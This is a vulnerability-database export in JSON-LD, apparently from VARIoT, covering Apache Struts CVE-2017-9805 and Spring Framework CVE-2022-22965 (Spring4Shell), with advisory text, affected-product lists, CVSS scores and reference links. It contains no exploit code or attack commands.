"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-9805"
},
{
"trust": 0.8,
"url": "https://www.jpcert.or.jp/at/2017/at170033.html"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu92761484/index.html"
},
{
"trust": 0.6,
"url": "http://www.apache.org/"
},
{
"trust": 0.3,
"url": "http://struts.apache.org/docs/s2-049.html"
},
{
"trust": 0.3,
"url": "http://struts.apache.org/docs/s2-047.html"
},
{
"trust": 0.3,
"url": "http://struts.apache.org/announce.html#a20170707"
},
{
"trust": 0.3,
"url": "http://struts.apache.org/docs/s2-048.html"
},
{
"trust": 0.3,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1488491"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2017-9804"
},
{
"trust": 0.3,
"url": "https://struts.apache.org/docs/s2-050.html"
},
{
"trust": 0.3,
"url": "https://struts.apache.org/docs/s2-051.html"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2017-9793"
},
{
"trust": 0.3,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1488481"
},
{
"trust": 0.3,
"url": "https://lgtm.com/blog/apache_struts_cve-2017-9805_announcement"
},
{
"trust": 0.3,
"url": "https://struts.apache.org/docs/version-notes-2513.html"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2017-9805"
},
{
"trust": 0.3,
"url": "https://struts.apache.org/docs/s2-053.html"
},
{
"trust": 0.3,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20170909-struts2-rce"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2017-12611"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#112992"
},
{
"db": "BID",
"id": "99562"
},
{
"db": "BID",
"id": "99563"
},
{
"db": "BID",
"id": "99484"
},
{
"db": "BID",
"id": "100612"
},
{
"db": "BID",
"id": "100611"
},
{
"db": "BID",
"id": "100609"
},
{
"db": "BID",
"id": "100829"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-914"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006931"
},
{
"db": "NVD",
"id": "CVE-2017-9805"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#112992"
},
{
"db": "VULMON",
"id": "CVE-2017-9805"
},
{
"db": "BID",
"id": "99562"
},
{
"db": "BID",
"id": "99563"
},
{
"db": "BID",
"id": "99484"
},
{
"db": "BID",
"id": "100612"
},
{
"db": "BID",
"id": "100611"
},
{
"db": "BID",
"id": "100609"
},
{
"db": "BID",
"id": "100829"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-914"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006931"
},
{
"db": "NVD",
"id": "CVE-2017-9805"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-06T00:00:00",
"db": "CERT/CC",
"id": "VU#112992"
},
{
"date": "2017-09-15T00:00:00",
"db": "VULMON",
"id": "CVE-2017-9805"
},
{
"date": "2017-07-13T00:00:00",
"db": "BID",
"id": "99562"
},
{
"date": "2017-07-13T00:00:00",
"db": "BID",
"id": "99563"
},
{
"date": "2017-07-07T00:00:00",
"db": "BID",
"id": "99484"
},
{
"date": "2017-09-05T00:00:00",
"db": "BID",
"id": "100612"
},
{
"date": "2017-09-05T00:00:00",
"db": "BID",
"id": "100611"
},
{
"date": "2017-09-05T00:00:00",
"db": "BID",
"id": "100609"
},
{
"date": "2017-09-07T00:00:00",
"db": "BID",
"id": "100829"
},
{
"date": "2017-06-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201706-914"
},
{
"date": "2017-09-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-006931"
},
{
"date": "2017-09-15T19:29:00.237000",
"db": "NVD",
"id": "CVE-2017-9805"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-06T00:00:00",
"db": "CERT/CC",
"id": "VU#112992"
},
{
"date": "2019-08-12T00:00:00",
"db": "VULMON",
"id": "CVE-2017-9805"
},
{
"date": "2017-09-27T15:00:00",
"db": "BID",
"id": "99562"
},
{
"date": "2017-09-27T15:00:00",
"db": "BID",
"id": "99563"
},
{
"date": "2017-09-27T15:00:00",
"db": "BID",
"id": "99484"
},
{
"date": "2017-09-27T15:00:00",
"db": "BID",
"id": "100612"
},
{
"date": "2017-09-27T15:00:00",
"db": "BID",
"id": "100611"
},
{
"date": "2017-09-27T10:00:00",
"db": "BID",
"id": "100609"
},
{
"date": "2017-09-27T15:00:00",
"db": "BID",
"id": "100829"
},
{
"date": "2019-08-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201706-914"
},
{
"date": "2017-09-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-006931"
},
{
"date": "2025-10-22T00:16:12.827000",
"db": "NVD",
"id": "CVE-2017-9805"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "99562"
},
{
"db": "BID",
"id": "99563"
},
{
"db": "BID",
"id": "99484"
},
{
"db": "BID",
"id": "100612"
},
{
"db": "BID",
"id": "100611"
},
{
"db": "BID",
"id": "100609"
},
{
"db": "BID",
"id": "100829"
}
],
"trust": 2.1
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apache Struts 2 framework REST plugin insecurely deserializes untrusted XML data",
"sources": [
{
"db": "CERT/CC",
"id": "VU#112992"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Failure to Handle Exceptional Conditions",
"sources": [
{
"db": "BID",
"id": "99562"
},
{
"db": "BID",
"id": "99563"
},
{
"db": "BID",
"id": "100612"
},
{
"db": "BID",
"id": "100611"
}
],
"trust": 1.2
}
}
VAR-202203-1506
Vulnerability from variot - Updated: 2025-11-21 21:36A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. The Spring Framework insecurely handles PropertyDescriptor objects, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.CVE-2022-22965 AffectedCVE-2022-22965 Affected. Description:
AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. For further information, refer to the release notes linked to in the References section. The purpose of this text-only errata is to inform you about the security issues fixed in this release. Description:
A micro version update (from 1.6.4 to 1.6.5) is now available for Red Hat Camel K that includes CVE fixes in the base images, which are documented in the Release Notes document linked in the References section. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
Installation instructions are available from the Fuse 7.10 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Low: Red Hat Decision Manager 7.12.1 security update Advisory ID: RHSA-2022:1379-01 Product: Red Hat Decision Manager Advisory URL: https://access.redhat.com/errata/RHSA-2022:1379 Issue date: 2022-04-14 CVE Names: CVE-2022-22965 ==================================================================== 1. Summary:
An update is now available for Red Hat Decision Manager.
Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and business optimization for solving planning problems. It automates business decisions and makes that logic available to the entire business.
This asynchronous security patch is an update to Red Hat Decision Manager 7.
Security Fix(es):
- spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
This release upgrades Spring to 5.3.18 and Spring Boot to 2.6.6 which fixes the Spring MVC and WebFlux jars.
For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
It is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.
The References section of this erratum contains a download link (you must log in to download the update).
- Bugs fixed (https://bugzilla.redhat.com/):
2070348 - CVE-2022-22965 spring-framework: RCE via Data Binding on JDK 9+
- References:
https://access.redhat.com/security/cve/CVE-2022-22965 https://access.redhat.com/security/updates/classification/#low https://access.redhat.com/security/vulnerabilities/RHSB-2022-003 https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches&product=rhdm&version=7.12.1
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYlidHNzjgjWX9erEAQhBihAApV3yXc8aEuRq9fMKL4EnxKcmHt9dgnX2 /Xsdp+isSEvWlE+TC/Ou0tptT1ZPfO3Adm/bXbsboaiq790W+aF8qHEYuA+WxtRW RY9cx4AS/QfRo+puk36QAWUSEx4WzKeU1no/5A7hezcPxIEGP+EdSX4DgDaVW9mB CZndXwiYAzLyYgVFI/y5AJP8CPZTvwFjdunOBDwqqNsKiVgFOjqHMJo/X+yus4bU aFF0BAsA0OVCrjdnWV0fUqF1iON8cbELW7JqkGobM22PZZ6ngxzTXUTbvD1QovLM Cbj2Ay7l7DHH/3v9Hqk7NLpzp/fa9Z/lQ5c+3okHu0QvanphRllsC893/KGGMXfa 7+S3iWFKV2cJ2249z01eZgX30s7rlSlFRTB9hUlitWLiYaMkWWW0iqt0+2cPkjDv zP0hy1pYCyCFLluS85FVqW/9HBItNwReuXp9Vv3JqDy8L5+DIVv4WmSYcr4LCcj2 EC5WsIjNW7G4dL0RCukt+HascGTD+huNbzsrDuln4vQJ2HG+4vmH7Cmmlr4MvpHD Bw4BW6UI8a09axvbUVi2x+w1qTTdiO9J1x4ngaFKjbvItNpT3VRB3YfLcPck1Zv6 DCEC2g11LdPnO2JR5M6t2eMsFlkfLDtqDFotVVzGLBXQWj7I5R2YK+OPrEF2dnXD Pjhf0e6lKl4=xaz4 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202203-1506",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "sinec network management system",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0.3"
},
{
"model": "communications cloud native core unified data repository",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.0"
},
{
"model": "communications cloud native core network function cloud native environment",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.0"
},
{
"model": "spring framework",
"scope": "gte",
"trust": 1.0,
"vendor": "vmware",
"version": "5.3.0"
},
{
"model": "financial services behavior detection platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1.0"
},
{
"model": "netbackup virtual appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "4.0"
},
{
"model": "retail bulk data integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"model": "communications cloud native core policy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.0"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"model": "commerce platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.3.2"
},
{
"model": "communications cloud native core network slice selection function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.8.0"
},
{
"model": "netbackup appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "4.1"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"model": "cx cloud agent",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.1.0"
},
{
"model": "operation scheduler",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2.0.4"
},
{
"model": "communications cloud native core network function cloud native environment",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.10.0"
},
{
"model": "communications cloud native core console",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.0"
},
{
"model": "financial services analytical applications infrastructure",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1"
},
{
"model": "flex appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "2.0"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.3.2"
},
{
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.0.1"
},
{
"model": "siveillance identity",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "1.6"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.1"
},
{
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"model": "access appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "7.4.3.200"
},
{
"model": "retail financial integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"model": "financial services enterprise case management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.2.0"
},
{
"model": "sipass integrated",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "2.80"
},
{
"model": "sipass integrated",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "2.85"
},
{
"model": "netbackup appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "4.0.0.1"
},
{
"model": "netbackup virtual appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "4.1"
},
{
"model": "retail financial integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.3.2"
},
{
"model": "access appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "7.4.3"
},
{
"model": "netbackup appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "4.0"
},
{
"model": "netbackup flex scale appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "3.0"
},
{
"model": "siveillance identity",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "1.5"
},
{
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"model": "access appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "7.4.3.100"
},
{
"model": "communications cloud native core network slice selection function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"model": "communications policy management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.6.0.0.0"
},
{
"model": "flex appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "2.0.2"
},
{
"model": "financial services enterprise case management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1.1"
},
{
"model": "retail customer management and segmentation foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0"
},
{
"model": "simatic speech assistant for machines",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "1.2.1"
},
{
"model": "financial services enterprise case management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1.0"
},
{
"model": "communications cloud native core unified data repository",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.0"
},
{
"model": "financial services behavior detection platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1.1"
},
{
"model": "communications cloud native core security edge protection proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.7.0"
},
{
"model": "netbackup virtual appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "4.1.0.1"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.1.0.0"
},
{
"model": "sd-wan edge",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.0"
},
{
"model": "netbackup virtual appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "4.0.0.1"
},
{
"model": "communications cloud native core policy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"model": "spring framework",
"scope": "lt",
"trust": 1.0,
"vendor": "vmware",
"version": "5.2.20"
},
{
"model": "mysql enterprise monitor",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.29"
},
{
"model": "communications unified inventory management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.4.1"
},
{
"model": "financial services analytical applications infrastructure",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.2.0"
},
{
"model": "communications cloud native core automated test suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.0"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"model": "netbackup flex scale appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "2.1"
},
{
"model": "flex appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "1.3"
},
{
"model": "communications cloud native core security edge protection proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.0"
},
{
"model": "spring framework",
"scope": "lt",
"trust": 1.0,
"vendor": "vmware",
"version": "5.3.18"
},
{
"model": "communications cloud native core network exposure function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.0"
},
{
"model": "sd-wan edge",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.1"
},
{
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3.1"
},
{
"model": "flex appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "2.1"
},
{
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.3"
},
{
"model": "flex appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "2.0.1"
},
{
"model": "communications unified inventory management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.5.0"
},
{
"model": "financial services behavior detection platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.2.0"
},
{
"model": "netbackup appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "veritas",
"version": "4.1.0.1"
},
{
"model": "communications cloud native core console",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.9.0"
},
{
"model": "communications cloud native core automated test suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.9.0"
},
{
"model": "retail customer management and segmentation foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0"
},
{
"model": "communications unified inventory management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.4.2"
},
{
"model": "retail financial integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3.1"
},
{
"model": "retail customer management and segmentation foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.0"
},
{
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.1"
},
{
"model": "retail financial integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.1"
},
{
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.0"
},
{
"model": "communications cloud native core network slice selection function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.0"
},
{
"model": "product lifecycle analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.6.1"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-22965"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "This document was written by Will DormannWe have not received a statement from the vendor.",
"sources": [
{
"db": "CERT/CC",
"id": "VU#970766"
}
],
"trust": 0.8
},
"cve": "CVE-2022-22965",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2022-22965",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-411825",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2022-22965",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-22965",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-22965",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-202203-2642",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-202203-2514",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-411825",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2022-22965",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-411825"
},
{
"db": "VULMON",
"id": "CVE-2022-22965"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2642"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2514"
},
{
"db": "NVD",
"id": "CVE-2022-22965"
},
{
"db": "NVD",
"id": "CVE-2022-22965"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. The Spring Framework insecurely handles PropertyDescriptor objects, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.CVE-2022-22965 AffectedCVE-2022-22965 Affected. Description:\n\nAMQ Broker is a high-performance messaging implementation based on ActiveMQ\nArtemis. It uses an asynchronous journal for fast message persistence, and\nsupports multiple languages, protocols, and platforms. For further information, refer to the release notes linked to\nin the References section. The purpose of this text-only errata is to inform you\nabout the security issues fixed in this release. Description:\n\nA micro version update (from 1.6.4 to 1.6.5) is now available for Red Hat\nCamel K that includes CVE fixes in the base images, which are documented in\nthe Release Notes document linked in the References section. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n4. \n\nInstallation instructions are available from the Fuse 7.10 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Low: Red Hat Decision Manager 7.12.1 security update\nAdvisory ID: RHSA-2022:1379-01\nProduct: Red Hat Decision Manager\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:1379\nIssue date: 2022-04-14\nCVE Names: CVE-2022-22965\n====================================================================\n1. Summary:\n\nAn update is now available for Red Hat Decision Manager. \n\nRed Hat Product Security has rated this update as having a security impact\nof Low. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat Decision Manager is an open source decision management platform\nthat combines business rules management, complex event processing, Decision\nModel \u0026 Notation (DMN) execution, and business optimization for solving\nplanning problems. It automates business decisions and makes that logic\navailable to the entire business. \n\nThis asynchronous security patch is an update to Red Hat Decision Manager\n7. \n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+\n(CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n3. \n\nThis release upgrades Spring to 5.3.18 and Spring Boot to 2.6.6 which fixes\nthe Spring MVC and WebFlux jars. \n\nFor on-premise installations, before applying the update, back up your\nexisting installation, including all applications, configuration files,\ndatabases and database settings, and so on. \n\nIt is recommended to halt the server by stopping the JBoss Application\nServer process before installing this update; after installing the update,\nrestart the server by starting the JBoss Application Server process. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2070348 - CVE-2022-22965 spring-framework: RCE via Data 